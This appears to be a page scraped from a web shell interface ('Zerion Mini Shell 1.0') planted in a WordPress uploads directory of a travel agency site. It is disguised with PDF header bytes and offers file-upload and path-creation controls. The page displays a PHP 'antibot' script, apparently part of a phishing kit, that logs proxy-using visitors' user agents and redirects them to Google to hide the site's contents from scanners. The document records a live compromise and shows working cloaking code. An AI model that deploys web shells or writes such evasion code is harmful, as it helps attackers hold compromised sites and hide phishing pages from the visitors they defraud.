%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/friendstravel.al/wp-content/uploads/index/antibots/
Upload File :
Create Path :
Current File : /var/www/html/friendstravel.al/wp-content/uploads/index/antibots/antibot_proxy.php

<?php
$blockProxy = strtolower($blockProxy);
$ip = gethostbyaddr($_SERVER['REMOTE_ADDR']);
if ($blockProxy == "true") {
	$response = checkProxy($ip);
	if ($response == "false") {
			$content = "AntiBots ".$_SERVER['HTTP_USER_AGENT']." [ Proxy ] \r\n";
		    $save=fopen("bots.txt","a+");
		    fwrite($save,$content);
		    fclose($save);
			header("Location: http://www.google.com/");exit();
	}
}
?>

Zerion Mini Shell 1.0